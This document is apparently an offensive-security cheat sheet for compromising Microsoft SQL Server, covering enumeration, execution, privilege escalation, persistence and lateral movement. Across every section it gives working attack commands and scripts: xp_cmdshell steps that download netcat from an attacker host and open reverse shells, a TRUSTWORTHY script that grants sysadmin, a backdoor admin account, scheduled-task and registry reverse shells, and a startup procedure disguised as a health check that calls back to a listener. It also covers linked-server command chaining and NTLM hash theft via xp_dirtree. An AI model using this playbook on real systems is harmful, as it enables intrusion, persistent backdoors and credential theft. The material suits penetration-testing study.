Enumeration
Core Concept
Enumerate Microsoft SQL Server services to identify users, roles, permissions, databases, and execution capabilities to prepare for exploitation.
🔹 In → Gaining Initial Foothold → Credential Access
🔸 Automatic Enumeration: Nmap Scripts
nmap -sV -p1433 --script \
ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes \
--script-args mssql.instance-port=1433,mssql.username=sa,mssql.password= \
<target-ip>
| Modifier | Description |
|---|---|
| -sV | Detects service version information on the target port |
| -p1433 | Scans only TCP port 1433 (the default instance port; named instances usually listen on a dynamic port that ms-sql-info can resolve through the Browser service on UDP 1434) |
| --script | Specifies NSE scripts to run during the scan |
| ms-sql-info | Collects instance name, version and network details, from the TCP pre-login handshake and, where reachable, the SQL Server Browser service on UDP 1434 |
| ms-sql-empty-password | Attempts to log in as sa with an empty password |
| ms-sql-xp-cmdshell | Runs an OS command through xp_cmdshell with the supplied credentials (default command: ipconfig /all); fails if the procedure is disabled or the login is not sysadmin |
| ms-sql-config | Queries configuration settings, databases and linked servers; the settings include whether xp_cmdshell and Ole Automation Procedures are enabled |
| ms-sql-ntlm-info | Extracts NetBIOS and DNS host/domain names and the OS version from the server's NTLM challenge; needs no credentials |
| ms-sql-tables | Lists user tables in the databases the login can access |
| ms-sql-hasdbaccess | Shows which databases the login can access |
| ms-sql-dac | Asks the Browser service for the Dedicated Administrator Connection (DAC) port of the instance, i.e. whether DAC is reachable over the network |
| ms-sql-dump-hashes | Dumps login names and password hashes from master in a crackable format; requires sysadmin-level access |
| --script-args | Supplies custom arguments to scripts |
| mssql.instance-port=1433 | Specifies the port where the MSSQL service is running |
| mssql.username=sa | Uses the sa login for authentication |
| mssql.password= | Attempts login with a blank password |
🔸 Metasploit Modules
use auxiliary/scanner/mssql/mssql_ping            # Queries the SQL Server Browser service (UDP 1434) for instance name, version and TCP port of every instance on a host; no credentials needed.
use auxiliary/admin/mssql/mssql_enum              # With a valid login, enumerates version, configuration (xp_cmdshell and friends), databases, logins, roles and privileges.
use auxiliary/admin/mssql/mssql_enum_sql_logins   # Enumerates SQL logins by walking principal IDs, which works even when the login has no rights to read sys.server_principals.
use auxiliary/scanner/mssql/mssql_hashdump        # Dumps login names and password hashes from the master database (needs sysadmin).
use auxiliary/admin/mssql/mssql_findandsampledata # Searches accessible tables for column names matching keywords (password, ssn, credit card) and samples their contents.
🔸 Manual Queries
SELECT SYSTEM_USER, USER_NAME(), IS_SRVROLEMEMBER('sysadmin');   -- login, database user, and whether the login is already sysadmin (1/0)
SELECT @@version;                                                  -- product, build and host OS; decides which escalation paths apply
SELECT name FROM master.sys.databases;                             -- databases on the instance (rows the login cannot see are omitted)
SELECT * FROM sysobjects WHERE xtype='U';                          -- user tables in the current database (legacy view; sys.tables is the modern equivalent)
SELECT * FROM sys.server_principals;                               -- logins, server roles and their SIDs
SELECT * FROM fn_my_permissions(NULL, 'SERVER');                   -- effective server-level permissions of the current login
SELECT * FROM fn_my_permissions(NULL, 'DATABASE');                 -- effective permissions in the current database
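The queries above each answer one question. The script below is added here as a worked example (it is not part of the original page) and runs in one pass the checks a practitioner wants right after connecting: identity, who else holds server roles, which execution-related options are already on, which databases are TRUSTWORTHY and owned by a sysadmin, and which server-level rights the login holds on its own. It uses only catalog views and built-in functions, so it runs for any login and changes nothing; rows the login is not allowed to see are simply absent.

```sql
-- Situational-awareness pass after landing on an MSSQL prompt (added example, not page code).
-- Catalog views and built-in functions only: no configuration is changed.

-- 1. Identity and version
SELECT SYSTEM_USER                      AS login_name,
       ORIGINAL_LOGIN()                 AS original_login,   -- differs from SYSTEM_USER while impersonating
       USER_NAME()                      AS db_user,
       DB_NAME()                        AS current_db,
       IS_SRVROLEMEMBER('sysadmin')     AS is_sysadmin,
       @@SERVERNAME                     AS server_name,
       SERVERPROPERTY('ProductVersion') AS product_version;

-- 2. Fixed server role membership: who else is sysadmin / securityadmin / serveradmin
SELECT r.name AS server_role, m.name AS member, m.type_desc, m.is_disabled
FROM sys.server_role_members rm
JOIN sys.server_principals r ON rm.role_principal_id   = r.principal_id
JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id
WHERE r.name IN ('sysadmin', 'securityadmin', 'serveradmin')
ORDER BY r.name, m.name;

-- 3. Execution-related server options as they currently stand (value_in_use = running value)
SELECT name, CAST(value_in_use AS int) AS in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled',
               'clr strict security', 'Ad Hoc Distributed Queries', 'scan for startup procs')
ORDER BY name;

-- 4. Databases: owner, TRUSTWORTHY flag, whether that owner is sysadmin, and our access.
--    is_trustworthy_on = 1 AND owner_is_sysadmin = 1 AND i_have_access = 1 marks a candidate
--    for the TRUSTWORTHY escalation; db_owner membership is then checked inside that database.
SELECT d.name                    AS db_name,
       SUSER_SNAME(d.owner_sid)  AS owner_login,
       d.is_trustworthy_on,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin,
       HAS_DBACCESS(d.name)      AS i_have_access,
       d.state_desc
FROM sys.databases d
ORDER BY d.is_trustworthy_on DESC, d.name;

-- 5. Server-level permissions of this login that lead somewhere on their own
SELECT permission_name
FROM fn_my_permissions(NULL, 'SERVER')
WHERE permission_name IN ('CONTROL SERVER', 'ALTER SETTINGS', 'ALTER ANY LOGIN',
                          'IMPERSONATE ANY LOGIN', 'ADMINISTER BULK OPERATIONS',
                          'ALTER ANY LINKED SERVER', 'UNSAFE ASSEMBLY', 'EXTERNAL ACCESS ASSEMBLY');

-- 6. Enabled SQL (password-based) logins: password-spray and reuse targets.
--    is_policy_checked = 0 means no complexity or lockout policy applies to that login.
SELECT name, is_disabled, is_policy_checked, is_expiration_checked, create_date
FROM sys.sql_logins
ORDER BY name;
```

Run it as the first thing after mssqlclient.py connects; step 4 is the one to read first, because a TRUSTWORTHY database owned by sa and reachable by the current login is the quietest route to sysadmin on the page.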
🔸 Bruteforce
mssqlpwner hosts.txt brute -ul users.txt -pl passwords.txt
Spray (few passwords, many users) rather than brute-force against Windows logins, since the domain lockout policy applies to them; SQL logins are only subject to lockout when is_policy_checked is set on them, which is why sa and application logins are the usual targets.
Execution
Core Concept
Achieve OS-level command execution on MSSQL using xp_cmdshell, PowerShell payloads, and alternative procedures.
🔸 Through → Navigating Internals → Execution
🔸 Connect with Impacket
Impacket is a Python toolkit that provides low-level access to network protocols, including Microsoft's Tabular Data Stream (TDS) protocol used by MSSQL. The mssqlclient.py script gives an authenticated, interactive SQL prompt against a remote SQL Server.
python3 mssqlclient.py DOMAIN/username@ip -windows-auth
- DOMAIN/username@ip: the domain and user to authenticate as (e.g. ACME/jdoe@10.10.10.10). The password is prompted for, or can be given inline as DOMAIN/username:password@ip.
- -windows-auth: use Windows (NTLM) authentication instead of a SQL login. Omit it for SQL logins such as sa.
This is typically used after credential discovery (via 13_Credential_Access or bruteforce). Once connected, you get an interactive SQL prompt where you can run queries or stored procedures like xp_cmdshell; mssqlclient.py also ships helper commands (enable_xp_cmdshell, xp_cmdshell) that wrap the steps below. Check SYSTEM_USER and IS_SRVROLEMEMBER('sysadmin') first, because everything in this section needs sysadmin.
🔸 Enable xp_cmdshell
By default, xp_cmdshell is disabled on MSSQL for security reasons. This extended stored procedure allows execution of system commands (like whoami, dir, or launching payloads) directly from SQL, in the security context of the SQL Server service account.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
- show advanced options: unlocks the advanced configuration options, of which xp_cmdshell is one.
- xp_cmdshell: enables the ability to run operating system commands.
Changing either option requires the ALTER SETTINGS permission, held by sysadmin and serveradmin; if the login is not sysadmin yet, escalate first (see Privilege Escalation). The change is server-wide and lands in sys.configurations (row xp_cmdshell, column value_in_use), so it is visible to anyone monitoring configuration drift; turn it back off when done.
Enabling this is a key post-exploitation step for turning SQL access into OS-level code execution.
🔸 Upload & Trigger Reverse Shell
Once xp_cmdshell is enabled, you can use it to download and execute a reverse shell binary such as nc64.exe (Netcat).
EXEC xp_cmdshell 'powershell -c wget http://your.ip/nc64.exe -outfile C:\nc.exe';
EXEC xp_cmdshell 'C:\nc.exe your.ip 443 -e cmd.exe';
Step Breakdown:
- File download: uses PowerShell to fetch nc64.exe from your attack box (wget is an alias of Invoke-WebRequest in Windows PowerShell; host the file with python3 -m http.server). Single quotes are the T-SQL string delimiter and backslashes are literal inside them, so C:\nc.exe needs no escaping. The service account often cannot write to the root of C:\; C:\Windows\Temp or the instance's own data directory is a safer drop location.
- Execution trigger: calls Netcat with -e cmd.exe to spawn a shell and connect back to your listener (e.g. nc -lvnp 443). The xp_cmdshell call blocks for as long as the shell is open, so run it from a second connection if you still need the SQL prompt.
If this works, you'll get a shell on your attacking machine with the privileges of the SQL Server service account (NT Service\MSSQLSERVER by default, or a domain service account), spawned as a child of sqlservr.exe, which is exactly the parent-child relationship that process-creation telemetry flags.
🔸 Alternate Execution Paths
If xp_cmdshell is blocked or monitored, you can try other procedures:
| Stored Procedure | Description |
|---|---|
| sp_OACreate / sp_OAMethod | Instantiate COM objects such as WScript.Shell and call Run on them for RCE. Needs the 'Ole Automation Procedures' option, which is off by default and requires sysadmin to enable, like xp_cmdshell. |
| sp_start_job | Starts an existing SQL Agent job; with sp_add_job / sp_add_jobstep you can create a CmdExec or PowerShell step that runs OS commands. Requires the Agent service to be running and an Agent role (SQLAgentUserRole for jobs you own, SQLAgentOperatorRole for any job) or sysadmin. |
| OPENROWSET(BULK ...) | Reads a local file as a single row (output captured by another technique, config files, keys on disk); needs ADMINISTER BULK OPERATIONS. With 'Ad Hoc Distributed Queries' enabled, OPENROWSET can also query other servers through an OLE DB provider. |
| xp_dirtree / xp_fileexist | List a directory or test a path. Pointed at a UNC path they make the service account authenticate to your host, leaking a NetNTLMv2 response to Responder or a relay. Executable by public, so no elevated SQL rights are needed. |
These methods are valuable alternatives in environments where xp_cmdshell is restricted, though each leaves its own trace: sys.configurations changes, Agent job history, and file-system or outbound SMB artefacts.
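A worked version of the first and third rows of the table, added here as an example (it is not code from the page or from any tool): run a command through WScript.Shell via the OLE Automation procedures, then read its output back with OPENROWSET(BULK ...), and remove the file through the same COM route. Assumed: the login is sysadmin (needed both for sp_configure and for ADMINISTER BULK OPERATIONS), the service account can write to C:\Windows\Temp, and the command and file name are placeholders.

```sql
-- OS command execution without xp_cmdshell: OLE Automation plus file read-back (added example).
-- Requires sysadmin. Output path and command are placeholders for this example.

-- 1. OLE Automation is an advanced option and is off by default, like xp_cmdshell.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
GO

DECLARE @shell INT, @fso INT, @hr INT;
DECLARE @out NVARCHAR(260) = N'C:\Windows\Temp\oa_out.txt';
-- cmd.exe performs the redirection; 2>&1 folds stderr into the same file so failures are visible too
DECLARE @cmd NVARCHAR(4000) = N'cmd.exe /c whoami /all > "' + @out + N'" 2>&1';

-- 2. WScript.Shell.Run(command, windowStyle, waitOnReturn): windowStyle 0 = hidden,
--    waitOnReturn 1 = block until the command exits, so the file is complete before step 3.
EXEC @hr = sp_OACreate 'WScript.Shell', @shell OUTPUT;
IF @hr = 0 EXEC @hr = sp_OAMethod @shell, 'Run', NULL, @cmd, 0, 1;
IF @hr <> 0 EXEC sp_OAGetErrorInfo @shell;        -- returns the COM error source and description
IF @shell IS NOT NULL EXEC sp_OADestroy @shell;

-- 3. Read the captured output as one varchar(max) row. OPENROWSET(BULK) takes a literal path
--    and needs ADMINISTER BULK OPERATIONS, which sysadmin holds.
SELECT BulkColumn AS command_output
FROM OPENROWSET(BULK 'C:\Windows\Temp\oa_out.txt', SINGLE_CLOB) AS f;

-- 4. Remove the artefact with Scripting.FileSystemObject.DeleteFile instead of a second command
EXEC @hr = sp_OACreate 'Scripting.FileSystemObject', @fso OUTPUT;
IF @hr = 0 EXEC @hr = sp_OAMethod @fso, 'DeleteFile', NULL, @out;
IF @hr <> 0 EXEC sp_OAGetErrorInfo @fso;
IF @fso IS NOT NULL EXEC sp_OADestroy @fso;
GO

-- 5. Put the options back the way they were found
EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;
GO
```

The COM route avoids the xp_cmdshell configuration flag that most baselines alert on, but the child process is still cmd.exe under sqlservr.exe and the 'Ole Automation Procedures' change is just as visible in sys.configurations, so the gain is against rule sets that only watch for xp_cmdshell by name.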
Privilege Escalation
Core Concept
Escalate privileges within Microsoft SQL Server using TRUSTWORTHY databases, impersonation rights, and sysadmin role abuse.
🔸 Through → Navigating Internals → Privilege Escalation
🔸 Trustworthy Database Exploitation
-- Preconditions: the database has TRUSTWORTHY ON, is owned by a sysadmin login (usually sa), and the current login is db_owner in it.
-- The procedure runs as the database owner; because the database is trusted, the owner's server-level rights apply inside it.
USE db_name;
CREATE PROCEDURE sp_elevate WITH EXECUTE AS OWNER AS ALTER SERVER ROLE sysadmin ADD MEMBER [user];   -- pre-2012 form: EXEC sp_addsrvrolemember 'user', 'sysadmin'
EXEC sp_elevate;
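The three statements above are the core of the technique. The script below is added as a worked example (not taken from the page) and wraps them in the checks that decide whether it will work, targets the caller's own login dynamically so nothing is hard-coded, verifies the result, and removes the procedure afterwards. [AppDB] is a placeholder for a database returned by the first query.

```sql
-- TRUSTWORTHY escalation with its preconditions checked (added example, not page code).
-- Placeholder: [AppDB] = a database listed by step 1.

-- 1. Candidates: TRUSTWORTHY ON, owned by a sysadmin login, and reachable by us.
SELECT d.name, SUSER_SNAME(d.owner_sid) AS owner_login
FROM sys.databases d
WHERE d.is_trustworthy_on = 1
  AND IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) = 1
  AND HAS_DBACCESS(d.name) = 1;
GO

USE AppDB;
GO
-- 2. We must be able to CREATE PROCEDURE here; db_owner membership (or being dbo) is the usual way.
SELECT IS_MEMBER('db_owner') AS am_db_owner, USER_NAME() AS db_user;
GO

-- 3. The procedure executes as the database owner. Because the database is TRUSTWORTHY, the
--    owner's server-level rights (sysadmin) are honoured inside it, so the body may change
--    server role membership. ORIGINAL_LOGIN() still names the real caller under EXECUTE AS,
--    which is how the grant targets our own login. (If you connect through a Windows group
--    login, substitute that group's login name: only existing logins can be added to a role.)
CREATE PROCEDURE dbo.sp_elevate
WITH EXECUTE AS OWNER
AS
BEGIN
    DECLARE @sql NVARCHAR(300) =
        N'ALTER SERVER ROLE sysadmin ADD MEMBER ' + QUOTENAME(ORIGINAL_LOGIN()) + N';';
    EXEC (@sql);
END;
GO

EXEC dbo.sp_elevate;
GO

-- 4. Verify. The catalog count is authoritative; if is_sysadmin still reads 0 in this session,
--    reconnect so a fresh login token picks up the new membership.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,
       (SELECT COUNT(*)
        FROM sys.server_role_members rm
        JOIN sys.server_principals r ON rm.role_principal_id   = r.principal_id
        JOIN sys.server_principals m ON rm.member_principal_id = m.principal_id
        WHERE r.name = 'sysadmin' AND m.name = ORIGINAL_LOGIN()) AS catalog_says;
GO

-- 5. Leave the database as found. The sysadmin membership itself persists until revoked with
--    ALTER SERVER ROLE sysadmin DROP MEMBER ..., which belongs in the engagement cleanup notes.
DROP PROCEDURE dbo.sp_elevate;
GO
```

The fix on the defender's side is the inverse of step 1: set TRUSTWORTHY OFF wherever it is not needed, and where it is needed, make sure the database owner is a low-privilege login rather than sa.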
🔸 User Impersonation
-- Who may impersonate which login. For an IMPERSONATE permission on a login, major_id is the login being impersonated
-- and grantee_principal_id is the login that received the right. The widely copied one-liner that joins on
-- grantor_principal_id usually returns the same names, but major_id is the column that identifies the target.
SELECT grantee.name AS who, target.name AS can_impersonate
FROM sys.server_permissions p
JOIN sys.server_principals target  ON p.major_id = target.principal_id
JOIN sys.server_principals grantee ON p.grantee_principal_id = grantee.principal_id
WHERE p.permission_name = 'IMPERSONATE' AND p.class_desc = 'SERVER_PRINCIPAL' AND p.state IN ('G', 'W');
EXECUTE AS LOGIN = 'sa';   -- switch the session's security context; SYSTEM_USER now reports sa, ORIGINAL_LOGIN() still reports you
REVERT;                    -- drop back to the original login
-- Logins holding IMPERSONATE ANY LOGIN (SQL Server 2014 and later) can do this against every login. Inside a TRUSTWORTHY database, a database user with IMPERSONATE on dbo can use EXECUTE AS USER = 'dbo' to reach the owner's server-level rights the same way.
🔸 Metasploit Modules
use auxiliary/admin/mssql/mssql_escalate_execute_as
use auxiliary/admin/mssql/mssql_escalate_dbowner
🔸 PowerShell Scripts
Invoke-SqlServer-Escalate-ExecuteAs.psm1
Invoke-SqlServer-ElevateDbOwner.psm1
Persistence
Core Concept
Maintain long-term access in SQL Server environments by creating scheduled tasks, startup procedures, registry edits, or new administrative users.
🔻 Out → Acting on Objectives → Persistence
🔸 Create User + Scheduled Task
EXEC xp_cmdshell 'net user backdoor P@ss123 /add';
EXEC xp_cmdshell 'net localgroup administrators backdoor /add';
EXEC xp_cmdshell 'schtasks /create /sc minute /mo 5 /tn updater /tr "cmd /c C:\nc.exe ip 443 -e cmd.exe"';
The account and task are created by the SQL Server service account, so this only works when that account is a local administrator (or LocalSystem); net user and schtasks fail otherwise. The task runs as the creating account unless /ru is given, and the inner command uses double quotes because the T-SQL string is already single-quoted. Each step is a textbook detection if auditing is on (4720 user created, 4732 member added to a local group, 4698 scheduled task created).
🔸 Registry Persistence
EXEC xp_regwrite 'HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'backdoor', 'REG_SZ', 'cmd.exe /c start C:\nc.exe ip 443 -e cmd.exe';
T-SQL strings do not use backslash escapes, so write the key path with single backslashes, and give nc.exe the listener address and -e as in the scheduled task, otherwise it only prints its usage. Writing under HKLM\...\Run needs the service account to have write access to that key (administrators by default); the value runs at every interactive logon rather than at boot, so pair it with a startup procedure or a task on hosts nobody logs on to. xp_regread against the same key confirms the value landed.
🔸 Startup Stored Procedures
- Create a procedure in the master database (owned by dbo, taking no parameters).
- Mark it to run at service start with sp_procoption (option startup = on); this also flips the server-wide 'scan for startup procs' setting, which is the tell for defenders.
🔸 CLR Assemblies
- Load a custom .NET DLL with CREATE ASSEMBLY and expose its methods as stored procedures to maintain code execution. Needs 'clr enabled'; from SQL Server 2017 'clr strict security' additionally requires the assembly to be signed and trusted, listed via sp_add_trusted_assembly, or the database to be TRUSTWORTHY with an owner holding UNSAFE ASSEMBLY.
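The Startup Stored Procedures bullets above describe the mechanism; the script below, added as an example and not drawn from the page, implements it end to end and finishes with the audit query that reveals such procedures, which is what a defender runs and what you run afterwards to confirm the flag was set. Assumed: sysadmin on the instance, a netcat binary already staged at C:\Windows\Temp\nc.exe, and 10.10.14.5:443 as a placeholder listener.

```sql
-- Startup stored procedure as persistence (added example, not page code).
-- Placeholders: C:\Windows\Temp\nc.exe (already staged) and the listener 10.10.14.5:443.

USE master;   -- startup procedures must live in master, be owned by dbo and take no parameters
GO

CREATE PROCEDURE dbo.sp_svc_healthcheck   -- the name is what appears in sys.procedures, so keep it dull
AS
BEGIN
    -- Runs under the service account when the service (re)starts, after database recovery.
    -- xp_cmdshell may have been switched off since we left, so the procedure re-enables it itself.
    EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
    EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
    -- no_output: there is no client to return rows to at startup. The call blocks for as long
    -- as the shell lives, so keep the body to this single command.
    EXEC xp_cmdshell 'C:\Windows\Temp\nc.exe 10.10.14.5 443 -e cmd.exe', no_output;
END;
GO

-- Flag it to run at startup. sp_procoption also sets 'scan for startup procs' = 1 server-wide.
EXEC sp_procoption @ProcName = N'dbo.sp_svc_healthcheck', @OptionName = 'startup', @OptionValue = 'on';
GO

-- Audit: every procedure in master marked to run at startup (the defender's query).
SELECT p.name, p.create_date, p.modify_date
FROM sys.procedures p
WHERE OBJECTPROPERTY(p.object_id, 'ExecIsStartup') = 1;

-- Is the instance scanning for them at all? A 1 here with no known startup procs is itself a finding.
SELECT name, CAST(value_in_use AS int) AS in_use
FROM sys.configurations
WHERE name = 'scan for startup procs';
GO

-- Removal, for the cleanup step of the engagement
EXEC sp_procoption @ProcName = N'dbo.sp_svc_healthcheck', @OptionName = 'startup', @OptionValue = 'off';
DROP PROCEDURE dbo.sp_svc_healthcheck;
GO
```

Because the callback fires only when the service restarts, this is a slow channel; it is the fallback that survives a password rotation of the backdoor account or deletion of the scheduled task, not the primary foothold.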
Lateral Movement
Core Concept
Pivot across systems by abusing MSSQL linked servers and triggering NTLM authentication to leak or relay credentials.
🔸 Through → Navigating Internals → Lateral Movement
🔸 Discover & Abuse Linked Servers
EXEC sp_linkedservers;                               -- names, providers and data sources of the configured links
EXEC ('xp_cmdshell ''whoami''') AT [LinkedServer];   -- remote procedure call through the link; needs RPC Out enabled on it
A link runs as the login mapped to it in sys.linked_logins (often a stored sysadmin credential), not as you, so a low-privilege login here can be sysadmin on the far side. If RPC Out is off, OPENQUERY([LinkedServer], '...') still runs pass-through queries on the remote instance.
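The two commands above find and use a single link. The script below is added as a worked example (not from the page or from any tool) and maps every link together with the login it uses, checks what you are on the far side without needing RPC Out, and shows how quoting nests when a command is pushed through two hops. [SQL02] and [SQL03] are placeholder link names.

```sql
-- Linked-server mapping and chained execution (added example, not page code).
-- Placeholders: [SQL02] = a link found in step 1, [SQL03] = a link visible from SQL02.

-- 1. Links, the outbound login they use, and whether EXEC ... AT is allowed.
--    uses_self_credential = 0 with a remote_name means a fixed stored credential: every caller
--    of the link becomes that remote login, whatever their local rights.
SELECT s.name AS link_name, s.data_source, s.provider,
       s.is_rpc_out_enabled,
       l.uses_self_credential,
       l.remote_name AS remote_login,
       lp.name       AS for_local_login      -- NULL = the mapping applies to all local logins
FROM sys.servers s
LEFT JOIN sys.linked_logins l      ON s.server_id = l.server_id
LEFT JOIN sys.server_principals lp ON l.local_principal_id = lp.principal_id
WHERE s.is_linked = 1
ORDER BY s.name;

-- 2. Identity on the far side. OPENQUERY works even when RPC Out is disabled; quotes inside the
--    pass-through string are doubled once.
SELECT * FROM OPENQUERY([SQL02],
    'SELECT @@SERVERNAME AS remote_server, SYSTEM_USER AS remote_login,
            IS_SRVROLEMEMBER(''sysadmin'') AS remote_sysadmin');

-- 3. Next hop: links configured on SQL02 itself
SELECT * FROM OPENQUERY([SQL02],
    'SELECT name, data_source, is_rpc_out_enabled FROM sys.servers WHERE is_linked = 1');

-- 4. Remote procedure execution (needs is_rpc_out_enabled = 1 and sysadmin on the far side).
--    Enabling xp_cmdshell remotely is a server-wide change on SQL02, as visible as doing it locally.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;
       EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT [SQL02];
EXEC ('EXEC xp_cmdshell ''whoami''') AT [SQL02];

-- 5. Two hops. The inner EXEC ... AT is itself text sent to SQL02, so each level doubles the
--    quotes again. SQL02 receives:  EXEC ('EXEC xp_cmdshell ''whoami''') AT [SQL03]
--    and SQL03 receives:            EXEC xp_cmdshell 'whoami'
EXEC ('EXEC (''EXEC xp_cmdshell ''''whoami'''''') AT [SQL03]') AT [SQL02];

-- 6. If RPC Out is off and you hold ALTER ANY LINKED SERVER locally, switch it on;
--    otherwise stay with OPENQUERY.
EXEC sp_serveroption @server = N'SQL02', @optname = 'rpc out', @optvalue = 'true';
```

Links are bidirectional in practice more often than on paper: step 3 run from each hop frequently finds a link pointing back at the server you started from, configured with a higher-privilege login than the one you came in with.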
🔸 Steal NetNTLM Hashes
EXEC xp_dirtree '\\attacker\share';   -- single backslashes: T-SQL does not escape them; the service account authenticates to the UNC path
sudo responder -I tun0                 -- on the attacker: captures the NetNTLMv2 response for cracking, or swap in ntlmrelayx to relay it
xp_dirtree is executable by public, so no elevated SQL rights are needed. The hash you capture belongs to the SQL Server service account; when that is a virtual account (NT Service\MSSQLSERVER) the network authentication is the computer account, which can be relayed but is not usefully crackable, whereas a domain service account with a weak password is.
🔸 Tools
- Metasploit: auxiliary/admin/mssql/mssql_ntlm_stealer (forces an xp_dirtree authentication to your listener), exploit/windows/mssql/mssql_linkcrawler (crawls linked-server chains and can deploy a payload through them)
- mssqlpwner: NTLM relay, link enumeration and chained execution over linked servers